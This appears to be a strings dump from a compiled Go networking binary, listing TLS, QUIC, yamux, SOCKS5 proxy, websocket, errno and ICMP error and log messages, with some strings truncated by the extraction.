%x&#39;<br>tls: received unexpected CertificateStatus message&#39;<br>tls: server&#39;s identity changed during renegotiation&quot;<br>tls: failed to write 
to key log: &#39;<br>tls: server selected unsupported compression format&#39;<br>tls: initial handshake had non-empty renegotiation extension&quot;<br>tls: server advertised unrequested ALPN extension&#39;<br>tls: server resumed a session with a different version&#39;<br>tls: server resumed a session with a different cipher suite&#39;<br>tls: server&#39;s Finished message was incorrect&quot;<br>tls: server selected TLS 1.3 using the legacy version field&#39;<br>tls: server selected an invalid version after a HelloRetryRequest&#39;<br>tls: server sent an incorrect legacy version&#39;<br>tls: server sent a ServerHello extension forbidden in TLS 1.3&quot;<br>tls: server selected unsupported compression format&#39;<br>tls: server changed cipher suite after a HelloRetryRequest&quot;<br>tls: server sent an unnecessary HelloRetryRequest message&quot;<br>tls: received malformed key_share extension&#39;<br>tls: server selected unsupported group&quot;<br>tls: server sent an unnecessary HelloRetryRequest key_share&quot;<br>tls: server sent a cookie in a normal ServerHello&#39;<br>tls: malformed key_share extension&#39;<br>tls: server did not send a key share&#39;<br>tls: server selected unsupported group&#39;<br>tls: server selected an invalid PSK&#39;<br>tls: server selected an invalid PSK and cipher suite pair&#39;<br>tls: invalid server key share&#39;<br>LPN negotiation failed. Server didn\&#39;t offer any protocols&#39;<br>ALPN negotiation failed. Server offered: %q&#39;<br>tls: server advertised unrequested ALPN extension&#39;<br>tls: certificate used with invalid signature algorithm&#39;<br>tls: certificate used with invalid signature algorithm&quot;<br>tls: invalid signature by the server certificate: &#39;<br>tls: invalid server finished hash&#39;<br>tls: failed to sign handshake: &#39;<br>tls: received a session ticket with invalid lifetime&#39;<br>invalid value length: expected %d, got %d&#39;<br>tls: internal error: failed to update binders&#39;<br>tls: negotiated TLS &lt; 1.3 when using QUIC&#39;<br>tls: client offered old TLS version %#x&#39;<br>tls: client offered only unsupported versions: %x&#39;<br>tls: client does not support uncompressed connections&quot;<br>tls: initial handshake had non-empty renegotiation extension&#39;<br>tls: unsupported signing key type (%T)&#39;<br>tls: unsupported decryption key type (%T)&quot;<br>tls: no cipher suite supported by both client and server&#39;<br>tls: client using inappropriate protocol fallback&#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the client certificate: &#39;<br>ls: client\&#39;s Finished message is incorrect&#39;<br>tls: failed to parse client certificate: &quot;<br>ls: client didn\&#39;t provide a certificate&#39;<br>tls: failed to verify client certificate: &#39;<br>tls: client certificate contains an unsupported public key of type %T&#39;<br>tls: client used the legacy version field to negotiate TLS 1.3&#39;<br>tls: client using inappropriate protocol fallback&#39;<br>tls: TLS 1.3 client supports illegal compression methods&#39;<br>b&#39;\x1c9\xbfZ8\xf4\xe1\xccWH\x8eUE4\x19\xb4\x85\x87qS%D\xe8\xe6\tH\xb8\xf3&#39;<br>f\xa5#!\xef9 handshake had non-empty renegotiation extension&#39;<br>tls: no cipher suite supported by both client and server&quot;<br>tls: no ECDHE curve supported by both client and server&#39;<br>tls: invalid or missing PSK binders&#39;<br>tls: client sent unexpected early data&#39;<br>resumption&#39;<br>tls: internal error: failed to clone 
hash&quot;<br>tls: invalid PSK binder&quot;<br>c e traffic&#39;<br>tls: client sent invalid key share in second ClientHello&#39;<br>tls: client indicated early data in second ClientHello&#39;<br>tls: client illegally modified second ClientHello&#39;<br>tls: client offered 0-RTT data in second ClientHello&#39;<br>ALPN negotiation failed. Client offered: %q&#39;<br>tls: failed to sign handshake: &#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the client certificate: &#39;<br>tls: invalid client finished hash&#39;<br>tls: certificate private key does not implement crypto.Decrypter&quot;<br>tls: unexpected ServerKeyExchange&#39;<br>tls: no supported elliptic curves offered&#39;<br>tls: certificate cannot be used with the selected cipher suite&#39;<br>tls: failed to sign ECDHE parameters: &#39;<br>tls: server selected unsupported curve&quot;<br>tls: server selected unsupported curve&#39;<br>tls: certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the server certificate: &#39;<br>tls: missing ServerKeyExchange message&#39;<br>tls: HKDF-Expand-Label invocation failed unexpectedly&#39;<br>tls: internal error: unsupported curve&#39;<br>unknown version&#39;<br>server finished&#39;<br>master secret&#39;<br>key expansion&#39;<br>crypto/tls: reserved ExportKeyingMaterial label: %s&#39;<br>crypto/tls: ExportKeyingMaterial context too long&#39;<br>tls: internal error: session ticket keys unavailable&#39;<br>tls: failed to create cipher while encrypting ticket: &#39;<br>tls.ConnectionState doesn\&#39;t match&#39;<br>qtls.ClientSessionState doesn&#39;t match&quot;<br>qtls.CertificateRequestInfo doesn&#39;t match&quot;<br>CONNECTION_REFUSED&#39;<br>FLOW_CONTROL_ERROR&#39;<br>STREAM_LIMIT_ERROR&#39;<br>STREAM_STATE_ERROR&#39;<br>INVALID_TOKEN&#39;<br>APPLICATION_ERROR&quot;<br>CRYPTO_BUFFER_EXCEEDED&#39;<br>NO_VIABLE_PATH&#39;<br>CRYPTO_ERROR (%#x)&#39;<br>unknown error code: %#x&#39;<br> (frame type: %#x)&#39;<br>Application error %#x&quot;<br>timeout: handshake did not complete in time&#39;<br>no compatible QUIC version found (we support %s, server offered %s)&quot;<br>received a stateless reset with token %x&#39;<br>unsupported version&#39;<br>invalid first ACK range&#39;<br>invalid packet number length: %d&#39;<br>invalid connection ID length: %d bytes&#39;<br>invalid connection ID length: %d bytes&#39;<br>invalid packet number length: %d&#39;<br>unknown frame type&#39;<br>%s not allowed at encryption level %s&#39;<br>unknown encryption level&#39;<br>not a QUIC packet&#39;<br>{Largest: %d, Smallest: %d}&quot;<br>t%s &amp;wire.MaxDataFrame{MaximumData: %d}&#39;<br>t%s &amp;wire.MaxStreamDataFrame{StreamID: %d, MaximumStreamData: %d}&#39;<br>t%s &amp;wire.DataBlockedFrame{MaximumData: %d}&#39;<br>t%s &amp;wire.StreamDataBlockedFrame{StreamID: %d, MaximumStreamData: %d}&#39;<br>t%s &amp;wire.MaxStreamsFrame{Type: uni, MaxStreamNum: %d}&#39;<br>t%s &amp;wire.MaxStreamsFrame{Type: bidi, MaxStreamNum: %d}&quot;<br>t%s &amp;wire.StreamsBlockedFrame{Type: uni, MaxStreams: %d}&#39;<br>t%s &amp;wire.StreamsBlockedFrame{Type: bidi, MaxStreams: %d}&#39;<br>t%s &amp;wire.NewTokenFrame{Token: %#x}&#39;<br>%d exceeds the maximum stream count&quot;<br>Retire Prior To value (%d) larger than Sequence Number (%d)&#39;<br>invalid connection ID length: %d&#39;<br>invalid connection ID length: %d&#39;<br>token must not be empty&#39;<br>wire.PutStreamFrame called with 
packet of wrong size!&quot;<br>stream data overflows maximum offset&#39;<br>StreamFrame: attempting to write empty frame without FIN&#39;<br>%d exceeds the maximum stream count&quot;<br>remaining length (%d) smaller than parameter length (%d)&#39;<br>client sent a preferred_address&quot;<br>wrong length for disable_active_migration: %d (expected empty)&quot;<br>client sent a stateless_reset_token&#39;<br>wrong length for stateless_reset_token: %d (expected 16)&quot;<br>client sent an original_destination_connection_id&quot;<br>client sent a retry_source_connection_id&#39;<br>missing original_destination_connection_id&#39;<br>missing initial_source_connection_id&#39;<br>received duplicate transport parameter %#x&#39;<br>invalid connection ID length: %d&quot;<br>expected preferred_address to be %d long, read %d bytes&#39;<br>inconsistent transport parameter length for transport parameter %#x&#39;<br>initial_max_streams_bidi too large: %d (maximum %d)&#39;<br>initial_max_streams_uni too large: %d (maximum %d)&quot;<br>invalid value for max_packet_size: %d (minimum 1200)&#39;<br>invalid value for ack_delay_exponent: %d (maximum %d)&#39;<br>invalid value for max_ack_delay: %dms (maximum %dms)&#39;<br>TransportParameter BUG: transport parameter %d not found&#39;<br>unknown transport parameter marshaling version: %d&#39;<br>RetrySourceConnectionID: %s, &#39;<br>Version Negotiation packet has empty version list&#39;<br>Version Negotiation packet has a version list with an invalid length&quot;<br>operation not permitted&quot;<br>no such process&#39;<br>interrupted system call&#39;<br>input/output error&#39;<br>argument list too long&#39;<br>exec format error&#39;<br>bad file descriptor&#39;<br>no child processes&#39;<br>resource temporarily unavailable&quot;<br>cannot allocate memory&quot;<br>permission denied&#39;<br>bad address&#39;<br>block device required&#39;<br>device or resource busy&#39;<br>file exists&#39;<br>no such device&#39;<br>not a directory&#39;<br>is a directory&#39;<br>too many open files in system&#39;<br>too many open files&#39;<br>inappropriate ioctl for device&quot;<br>text file busy&#39;<br>file too large&#39;<br>no space left on device&#39;<br>illegal seek&#39;<br>read-only file system&#39;<br>too many links&#39;<br>broken pipe&#39;<br>numerical argument out of domain&#39;<br>numerical result out of range&#39;<br>file name too long&quot;<br>no locks available&quot;<br>function not implemented&#39;<br>ENOTEMPTY&#39;<br>directory not empty&#39;<br>too many levels of symbolic links&#39;<br>identifier removed&#39;<br>channel number out of range&#39;<br>level 3 halted&#39;<br>level 3 reset&quot;<br>link number out of range&quot;<br>protocol driver not attached&quot;<br>level 2 halted&#39;<br>exchange full&#39;<br>invalid request code&quot;<br>invalid slot&#39;<br>bad font file format&#39;<br>device not a stream&quot;<br>no data available&#39;<br>timer expired&#39;<br>out of streams resources&#39;<br>machine is not on the network&#39;<br>package not installed&#39;<br>link has been severed&quot;<br>advertise error&#39;<br>srmount error&#39;<br>communication error on send&quot;<br>protocol error&#39;<br>EMULTIHOP&#39;<br>multihop attempted&#39;<br>RFS specific error&#39;<br>bad message&#39;<br>EOVERFLOW&quot;<br>value too large for defined data type&#39;<br>file descriptor in bad state&#39;<br>remote address changed&quot;<br>can not access a needed shared library&#39;<br>accessing a corrupted shared library&#39;<br>.lib section in a.out corrupted&#39;<br>invalid or incomplete 
multibyte or wide character&#39;<br>interrupted system call should be restarted&#39;<br>too many users&#39;<br>EDESTADDRREQ&#39;<br>destination address required&#39;<br>protocol wrong type for socket&quot;<br>ENOPROTOOPT&#39;<br>protocol not available&#39;<br>EPROTONOSUPPORT&#39;<br>protocol not supported&#39;<br>ESOCKTNOSUPPORT&#39;<br>operation not supported&#39;<br>EPFNOSUPPORT&#39;<br>protocol family not supported&#39;<br>EAFNOSUPPORT&#39;<br>address family not supported by protocol&#39;<br>EADDRINUSE&#39;<br>address already in use&#39;<br>EADDRNOTAVAIL&quot;<br>cannot assign requested address&#39;<br>ENETUNREACH&#39;<br>network is unreachable&#39;<br>ENETRESET&#39;<br>network dropped connection on reset&#39;<br>ECONNABORTED&quot;<br>software caused connection abort&#39;<br>ECONNRESET&#39;<br>connection reset by peer&quot;<br>transport endpoint is already connected&#39;<br>ESHUTDOWN&quot;<br>cannot send after transport endpoint shutdown&#39;<br>ETOOMANYREFS&#39;<br>too many references: cannot splice&#39;<br>ETIMEDOUT&#39;<br>connection timed out&#39;<br>ECONNREFUSED&quot;<br>connection refused&#39;<br>EHOSTDOWN&quot;<br>host is down&#39;<br>EHOSTUNREACH&#39;<br>EINPROGRESS&#39;<br>stale file handle&#39;<br>structure needs cleaning&#39;<br>not a XENIX named type file&#39;<br>no XENIX semaphores available&#39;<br>is a named type file&#39;<br>EREMOTEIO&#39;<br>disk quota exceeded&#39;<br>ENOMEDIUM&#39;<br>no medium found&#39;<br>EMEDIUMTYPE&#39;<br>wrong medium type&#39;<br>ECANCELED&#39;<br>operation canceled&#39;<br>key has expired&#39;<br>EKEYREVOKED&#39;<br>key has been revoked&#39;<br>EKEYREJECTED&#39;<br>key was rejected by service&#39;<br>EOWNERDEAD&#39;<br>owner died&#39;<br>ENOTRECOVERABLE&#39;<br>state not recoverable&#39;<br>operation not possible due to RF-kill&quot;<br>EHWPOISON&#39;<br>memory page has hardware error&#39;<br>interrupt&#39;<br>illegal instruction&#39;<br>trace/breakpoint trap&#39;<br>bus error&#39;<br>floating point exception&#39;<br>user defined signal 1&#39;<br>segmentation fault&quot;<br>user defined signal 2&#39;<br>broken pipe&#39;<br>alarm clock&#39;<br>terminated&#39;<br>SIGSTKFLT&#39;<br>stack fault&#39;<br>child exited&quot;<br>continued&#39;<br>stopped (tty input)&#39;<br>stopped (tty output)&#39;<br>urgent I/O condition&#39;<br>CPU time limit exceeded&#39;<br>file size limit exceeded&quot;<br>SIGVTALRM&#39;<br>virtual timer expired&#39;<br>profiling timer expired&#39;<br>I/O possible&#39;<br>power failure&quot;<br>bad system call&#39;<br>not implemented on &#39;<br>unknown connection type&#39;<br>short message&#39;<br>invalid address&#39;<br>short address&#39;<br>short address&#39;<br>destination unreachable&#39;<br>packet too big&quot;<br>time exceeded&#39;<br>parameter problem&#39;<br>echo request&#39;<br>echo reply&#39;<br>multicast listener query&#39;<br>router solicitation&#39;<br>router advertisement&#39;<br>neighbor solicitation&#39;<br>neighbor advertisement&#39;<br>icmp node information query&#39;<br>icmp node information response&#39;<br>home agent address discovery request message&#39;<br>home agent address discovery reply message&quot;<br>certification path solicitation message&#39;<br>certification path advertisement message&#39;<br>multicast router advertisement&quot;<br>multicast router solicitation&#39;<br>multicast router termination&#39;<br>fmipv6 messages&#39;<br>rpl control message&quot;<br>ilnpv6 locator update message&#39;<br>mpl control message&#39;<br>extended echo request&#39;<br>extended echo reply&#39;<br>invalid 
connection&#39;<br>missing address&#39;<br>not implemented on &#39;<br>echo reply&#39;<br>destination unreachable&#39;<br>router advertisement&#39;<br>router solicitation&#39;<br>time exceeded&#39;<br>parameter problem&#39;<br>timestamp&#39;<br>timestamp reply&#39;<br>extended echo reply&#39;<br>invalid connection&#39;<br>missing address&#39;<br>nil header&#39;<br>not implemented on &quot;<br>congestion BUG: decreased max datagram size from %d to %d&#39;<br>received packet with unknown encryption level: %s&#39;<br>Cannot drop keys for encryption level %s&#39;<br>unexpected encryption level&#39;<br>tIgnoring all packets below %d.&#39;<br>tQueueing ACK because the first packet should be acknowledged.&#39;<br>tQueueing ACK because packet %d was missing before.&quot;<br>tSetting ACK timer to max ack delay: %s&#39;<br>tQueuing ACK because there&#39;s a new missing packet to report.&quot;<br>Sending ACK because the ACK timer expired.&#39;<br>pto (Initial)&#39;<br>pto (Handshake)&#39;<br>pto (Application Data)&#39;<br>invalid send mode: %d&#39;<br>negative bytes_in_flight&#39;<br>Cannot drop keys for encryption level %s&#39;<br>invalid packet number space&#39;<br>Peer doesn&#39;t await address validation any longer.&quot;<br>received an ACK for skipped packet number: %d (%s)&#39;<br>tnewly acked packets (%d): %d&#39;<br>Canceling loss detection timer. Amplification limited.&#39;<br>Canceling loss detection timer. No packets in flight.&#39;<br>tlost packet %d (reordering threshold)&quot;<br>tsetting loss timer for packet %d (%s) to %s (in %s)&#39;<br>Loss detection alarm fired in loss timer mode. Loss time: %s&#39;<br>Loss detection alarm for %s fired in PTO mode. PTO count: %d&#39;<br>PTO timer in unexpected encryption level: %s&quot;<br>Amplification window limited. Received %d bytes, already sent out %d bytes&#39;<br>Limited by the number of tracked packets: tracking %d packets, maximum %d&#39;<br>Congestion limited: bytes in flight %d, window %d&quot;<br>Max outstanding limited: tracking %d packets, maximum: %d&#39;<br>no frames&#39;<br>packet %d not found in sent packet history&#39;<br>CryptoSetup: keys at this encryption level not yet available&#39;<br>CryptoSetup: keys were already dropped&#39;<br>decryption failed&#39;<br>ClientHello&#39;<br>ServerHello&#39;<br>Certificate&#39;<br>CertificateRequest&#39;<br>CertificateVerify&#39;<br>Received %s message (%d bytes, encryption level: %s)&quot;<br>missing quic_transport_parameters extension&quot;<br>unexpected handshake message: %d&#39;<br>expected handshake message %s to have encryption level %s, has %s&quot;<br>Restoring of transport parameters from session ticket failed: %s&#39;<br>mismatching version. Got %d, expected %d&quot;<br>Unmarshalling transport parameters from session ticket failed: %s&#39;<br>Accepting 0-RTT. 
Restoring RTT from session ticket: %s&quot;<br>error while handling the handshake message&#39;<br>error while handling the handshake message&quot;<br>Received 0-RTT read key for the client&#39;<br>Installed 0-RTT Read keys (using %s)&#39;<br>Installed Handshake Read keys (using %s)&#39;<br>Installed 1-RTT Read keys (using %s)&#39;<br>unexpected read encryption level&#39;<br>Received 0-RTT write key for the server&#39;<br>Installed 0-RTT Write keys (using %s)&quot;<br>Installed Handshake Write keys (using %s)&#39;<br>Installed 1-RTT Write keys (using %s)&quot;<br>Dropping 0-RTT keys.&#39;<br>unexpected write encryption level&#39;<br>Doing 0-RTT.&#39;<br>Dropping Initial keys.&#39;<br>Dropping Handshake keys.&#39;<br>Dropping 0-RTT keys.&#39;<br>Invalid cipher suite id: %d&quot;<br>error creating new AES cipher: %s&quot;<br>invalid sample size&#39;<br>invalid sample size&#39;<br>quic: HKDF-Expand-Label invocation failed unexpectedly&#39;<br>client in&#39;<br>server in&quot;<br>unexpected Retry integrity tag length: %d&quot;<br>failed to read session ticket revision&#39;<br>unknown session ticket revision: %d&quot;<br>failed to read RTT&#39;<br>unmarshaling transport parameters from session ticket failed: %s&quot;<br>rest when unpacking token: %d&quot;<br>token too short: %d&quot;<br>quic-go token source&#39;<br>Dropping key phase %d ahead of scheduled time. Drop time was: %s&#39;<br>Starting key drop timer to drop key phase %d (in %s)&#39;<br>unknown cipher suite %d&quot;<br>Dropping key phase %d&#39;<br>keys updated too quickly&#39;<br>Peer updated keys to %d&#39;<br>Peer confirmed key update to phase %d&#39;<br>received ACK for key phase %d, but peer didn&#39;t update keys&quot;<br>Initiating key update to key phase %d&#39;<br>received %d bytes for the connection, allowed %d bytes&#39;<br>Increasing receive flow control window for the connection to %d kB&#39;<br>flow controller reset after reading data&#39;<br>received inconsistent final offset for stream %d (old: %d, new: %d bytes)&#39;<br>Increasing receive flow control window for stream %d to %d kB&#39;<br>duplicate stream data&#39;<br>0-RTT rejected&#39;<br>too many open streams&#39;<br>negative packetBuffer refCount&quot;<br>packetBuffer refCount not zero&#39;<br>putPacketBuffer called with packet of wrong size!&#39;<br>Received %d packets after sending CONNECTION_CLOSE. 
Retransmitting.&quot;<br>Error retransmitting CONNECTION_CLOSE: %s&#39;<br>invalid value for Config.MaxIncomingStreams&#39;<br>retired connection ID %d (highest issued: %d)&#39;<br>received conflicting connection IDs for sequence number %d&#39;<br>received conflicting stateless reset tokens for sequence number %d&#39;<br>expected first connection ID to have sequence number 0&#39;<br>expected first connection ID to have sequence number 0&#39;<br>Activating reading of ECN bits for IPv4 and IPv6.&#39;<br>Activating reading of ECN bits for IPv4.&#39;<br>Activating reading of ECN bits for IPv6.&quot;<br>activating ECN failed for both IPv4 and IPv6&#39;<br>Activating reading of packet info for IPv4 and IPv6.&#39;<br>activating packet info failed for both IPv4 and IPv6&#39;<br>received invalid offset %d on crypto stream, maximum allowed %d&#39;<br>received crypto data after change of encryption level&#39;<br>encryption level changed, but crypto stream has more data to read&quot;<br>received CRYPTO frame with unexpected encryption level: %s&#39;<br>Discarding DATAGRAM frame (%d bytes payload)&#39;<br>stream %d canceled with error code %d&#39;<br>too many gaps in received data&#39;<br>no gap found&#39;<br>no gap found&quot;<br>frame sorter BUG: read position higher than a gap&#39;<br>cannot use different stateless reset keys on the same packet conn&#39;<br>cannot use different tracers on the same packet conn&#39;<br>failed to determine receive buffer size: %w&#39;<br>Conn has receive buffer of %d kiB (wanted: at least %d kiB)&#39;<br>failed to increase receive buffer size: %w&#39;<br>failed to determine receive buffer size: %w&#39;<br>failed to increase receive buffer size (wanted: %d kiB, got %d kiB)&#39;<br>Increased receive buffer size to %d kiB&#39;<br>Not adding connection ID %s, as it already exists.&quot;<br>Adding connection ID %s.&#39;<br>Not adding connection ID %s for a new session, as it already exists.&quot;<br>Adding connection IDs %s and %s for a new session.&#39;<br>Removing connection ID %s after it has been retired.&#39;<br>Replacing session for connection ID %s with a closed session.&quot;<br>Removing connection ID %s for a closed session after it has been retired.&#39;<br>Temporary error reading from conn: %w&#39;<br>error parsing connection ID on packet from %s: %s&quot;<br>received a packet with an unexpected connection ID %s&#39;<br>Received a stateless reset with token %#x. Closing session.&#39;<br>Sending stateless reset to %s (connection ID: %s). Token: %#x&#39;<br>Error sending Stateless Reset: %s&#39;<br>an\&#39;t determine encryption level&#39;<br>unknown encryption level&#39;<br>unexpected encryption level: %s&#39;<br>PacketPacker BUG: packet too large (%d bytes, allowed %d bytes)&#39;<br>packetPacker BUG: Peeked and Popped packet numbers do not match&#39;<br>unknown packet type: %s&#39;<br>Packet too small. Expected at least 20 bytes after the header, got %d&#39;<br>BUG: readPosInFrame (%d) &gt; frame.DataLen (%d) in stream.Read&quot;<br>Read on stream %d canceled with error code %d&#39;<br>STREAM frames are handled with their respective streams.&#39;<br>unexpected encryption level: %s&#39;<br>sendQueue.Send would have blocked&#39;<br>numOutStandingFrames negative&#39;<br>close called for canceled stream %d&#39;<br>%s is not a valid QUIC version&#39;<br>Listening for %s connections on %s&quot;<br>server closed&#39;<br>Dropping packet from %s (%d bytes). 
Server receive queue full.&#39;<br>Dropping Version Negotiation packet.&#39;<br>Error parsing packet: %s&#39;<br>misrouted packet: %#v&#39;<br>Dropping a packet that is too small to be a valid Initial (%d bytes)&quot;<br>Dropping long header packet of type %s (%d bytes)&#39;<br>&lt;- Received Initial packet.&#39;<br>Error occurred handling initial packet: %s&#39;<br>too short connection ID&#39;<br>Error sending INVALID_TOKEN error: %s&#39;<br>Error sending Retry: %s&quot;<br>Error rejecting connection: %s&#39;<br>Changing connection ID to %s.&#39;<br>Changing connection ID to %s.&#39;<br>Client sent an invalid retry token. Sending INVALID_TOKEN to %s.&#39;<br>Client offered version %s, sending Version Negotiation&#39;<br>Error composing Version Negotiation: %s&#39;<br>Error sending Version Negotiation: %s&#39;<br>closing session in order to recreate it&quot;<br>Sending a keep-alive PING to keep the connection alive.&#39;<br>Connection %s closed.&#39;<br>error parsing packet: %s&#39;<br>Dropping packet with version %x. Expected %x.&#39;<br>coalesced packet has different destination connection ID: %s, expected %s&#39;<br>Parsed a coalesced packet. Part %d: %d bytes. Remaining: %d bytes.&quot;<br>Dropping %s packet (%d bytes) because we already dropped the keys.&#39;<br>Dropping %s packet (%d bytes) that could not be unpacked. Error: %s&quot;<br>&lt;- Reading packet %d (%d bytes) for connection %s, %s&quot;<br>Dropping (potentially) duplicate packet.&#39;<br>Ignoring Retry.&#39;<br>Ignoring Retry, since we already received a packet.&#39;<br>Ignoring Retry, since a Retry was already received.&#39;<br>gnoring spoofed Retry. Integrity Tag doesn\&#39;t match.&#39;<br>&lt;- Received Retry:&#39;<br>Switching destination connection ID to: %s&#39;<br>Error parsing Version Negotiation packet: %s&#39;<br>Received a Version Negotiation packet. Supported Versions: %s&#39;<br>No compatible QUIC version found.&#39;<br>Switching to QUIC version %s.&#39;<br>empty packet&quot;<br>Received first packet. Switching destination connection ID to: %s&#39;<br>unexpected PATH_RESPONSE frame&#39;<br>received a HANDSHAKE_DONE frame&#39;<br>DATAGRAM frame too large&quot;<br>Destroying session: %s&#39;<br>Destroying session with error: %s&#39;<br>Peer closed session with error: %s&#39;<br>Error sending CONNECTION_CLOSE: %s&#39;<br>Restoring Transport Parameters: %s&quot;<br>Processed Transport Parameters: %s&#39;<br>expected initial_source_connection_id to equal %s, is %s&#39;<br>expected original_destination_connection_id to equal %s, is %s&#39;<br>missing retry_source_connection_id&#39;<br>expected retry_source_connection_id to equal %s, is %s&quot;<br>received retry_source_connection_id, although no Retry was performed&#39;<br>session BUG: couldn&#39;t pack %s probe packet&quot;<br>session BUG: unspecified error type (msg: %s)&#39;<br>-&gt; Sending coalesced packet (%d parts, %d bytes) for connection %s&#39;<br>-&gt; Sending packet %d (%d bytes) for connection %s, %s&quot;<br>-&gt; Sending packet %d (%d bytes) for connection %s, %s&#39;<br>shouldn&#39;t queue undecryptable packets after handshake completion&quot;<br>Dropping undecryptable packet (%d bytes). 
Undecryptable packet queue full.&quot;<br>deadline exceeded&#39;<br>peer attempted to open receive stream %d&#39;<br>peer attempted to open send stream %d&#39;<br>tried to delete unknown incoming stream %d&#39;<br>tried to delete incoming stream %d multiple times&#39;<br>tried to delete unknown incoming stream %d&#39;<br>tried to delete incoming stream %d multiple times&#39;<br>peer attempted to open stream %d&#39;<br>tried to delete unknown outgoing stream %d&#39;<br>peer attempted to open stream %d&#39;<br>tried to delete unknown outgoing stream %d&#39;<br>RSA PRIVATE KEY&#39;<br>CERTIFICATE&#39;<br>1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ&#39;<br>127.0.0.1:0&#39;<br>127.0.0.2:0&#39;<br>conn closed&#39;<br>conn closed&quot;<br>endpoint i/o timeout&#39;<br>UpdateConnState&quot;<br>implement me&#39;<br>6ba7b810-9dad-11d1-80b4-00c04fd430c8&#39;<br>6ba7b811-9dad-11d1-80b4-00c04fd430c8&quot;<br>6ba7b812-9dad-11d1-80b4-00c04fd430c8&#39;<br>6ba7b814-9dad-11d1-80b4-00c04fd430c8&#39;<br>invalid UUID (got %d bytes)&#39;<br>invalid UUID length: %d&#39;<br>urn:uuid:&#39;<br>invalid urn prefix: %q&#39;<br>invalid UUID format&#39;<br>invalid UUID format&#39;<br>invalid UUID format&quot;<br>read timeout&#39;<br>write timeout&#39;<br>unreachable&#39;<br>conn closed&#39;<br>TimeDeadline&#39;<br>already closed&#39;<br>127.0.0.2:&#39;<br>127.0.0.1:&#39;<br>not found %s&#39;<br>i/o deadline reached&#39;<br>stream closed&#39;<br>unexpected flag&#39;<br>remote end is not accepting connections&#39;<br>keepalive timeout&#39;<br>backlog must be positive&#39;<br>keep-alive interval must be positive&#39;<br>MaxStreamWindowSize must be larger than %d&#39;<br>both Logger and LogOutput may not be set, select one&#39;<br>one of Logger or LogOutput must be set, select one&#39;<br>unhandled state&#39;<br>[ERR] yamux: unexpected FIN flag in state %d&#39;<br>[ERR] yamux: Failed to read stream data: %v&#39;<br>[ERR] yamux: aborted stream open without inflight syn semaphore&#39;<br>[ERR] yamux: aborted stream open (destination=%s): %v&#39;<br>[ERR] yamux: keepalive failed: %v&#39;<br>[ERR] yamux: Failed to write header: %v&#39;<br>reset by peer&#39;<br>[ERR] yamux: Failed to read header: %v&quot;<br>[ERR] yamux: Invalid protocol version: %d&quot;<br>[WARN] yamux: Discarding data for stream: %d&#39;<br>[ERR] yamux: Failed to discard data: %v&#39;<br>[WARN] yamux: frame for missing stream: %v&#39;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: failed to send ping reply: %v&#39;<br>[ERR] yamux: received protocol error go away&#39;<br>yamux protocol error&#39;<br>[ERR] yamux: received internal error go away&quot;<br>remote yamux internal error&#39;<br>[ERR] yamux: received unexpected go away&quot;<br>unexpected go away received&#39;<br>[ERR] yamux: duplicate stream declared&quot;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: backlog exceeded, forcing connection reset&#39;<br>[ERR] yamux: SYN tracking out of sync&#39;<br>Vsn:%d Type:%d Flags:%d StreamID:%d Length:%d&#39;<br>stream id overflows, should start a new connection&quot;<br>operation would block on IO&#39;<br>unsupported protocol version&#39;<br>keep-alive interval must be positive&#39;<br>keep-alive timeout must be larger than keep-alive interval&quot;<br>max frame size must be positive&#39;<br>max frame size must not be larger than 65535&#39;<br>max receive buffer must be positive&#39;<br>max stream buffer must be positive&#39;<br>max stream buffer must not be 
larger than max receive buffer&#39;<br>max stream buffer cannot be larger than 2147483647&quot;<br>allocator Put() incorrect buffer size&#39;<br>both channel are nil&#39;<br>ALL_PROXY&#39;<br>all_proxy&#39;<br>connection forbidden&#39;<br>network unreachable&#39;<br>TTL expired&#39;<br>command not supported&#39;<br>websocket: close sent&quot;<br>websocket: read limit exceeded&#39;<br>websocket: write timeout&#39;<br>websocket: bad write message type&#39;<br>websocket: write closed&quot;<br>websocket: invalid control frame&#39;<br>websocket: bad handshake&#39;<br>websocket: invalid compression negotiation&#39;<br>malformed ws or wss URL&#39;<br>websocket: internal error, unexpected bytes at end of flate stream&#39;<br>proxy: unknown scheme: &#39;<br>proxy: no support for SOCKS5 proxy connections of type &#39;<br>proxy: failed to parse port number: &#39;<br>proxy: port number out of range: &#39;<br>proxy: failed to write greeting to SOCKS5 proxy at &#39;<br>proxy: failed to read greeting from SOCKS5 proxy at &#39;<br>proxy: SOCKS5 proxy at &#39;<br> has unexpected version &#39;<br>proxy: SOCKS5 proxy at &#39;<br> requires authentication&#39;<br>proxy: failed to write authentication request to SOCKS5 proxy at &#39;<br>proxy: failed to read authentication reply from SOCKS5 proxy at &#39;<br>proxy: SOCKS5 proxy at &quot;<br> rejected username/password&#39;<br>proxy: destination host name too long: &#39;<br>proxy: failed to write connect request to SOCKS5 proxy at &quot;<br>proxy: failed to read connect reply from SOCKS5 proxy at &quot;<br>unknown error&#39;<br>proxy: SOCKS5 proxy at &#39;<br> failed to connect: &#39;<br>proxy: failed to read domain length from SOCKS5 proxy at &#39;<br>proxy: got unknown address type &#39;<br> from SOCKS5 proxy at &#39;<br>proxy: failed to read address from SOCKS5 proxy at &#39;<br>Sec-Websocket-Extensions&#39;<br>websocket: close &#39;<br> (normal)&#39;<br> (going away)&#39;<br> (protocol error)&#39;<br> (unsupported data)&quot;<br> (no status)&#39;<br> (abnormal closure)&quot;<br> (invalid payload data)&#39;<br> (policy violation)&#39;<br> (message too big)&#39;<br> (mandatory extension missing)&#39;<br> (internal server error)&#39;<br> (TLS handshake error)&#39;<br>websocket: internal error, extra used in client mode&#39;<br>concurrent write to websocket connection&quot;<br>concurrent write to websocket connection&#39;<br>unexpected reserved bits 0x&#39;<br>message start before final message frame&quot;<br>continuation after final message frame&#39;<br>unknown opcode &#39;<br>incorrect mask flag&quot;<br>invalid close code&#39;<br>invalid utf8 payload in close frame&#39;<br>websocket: &quot;<br>repeated read on failed websocket connection&#39;<br>websocket: internal error, unexpected text or binary in 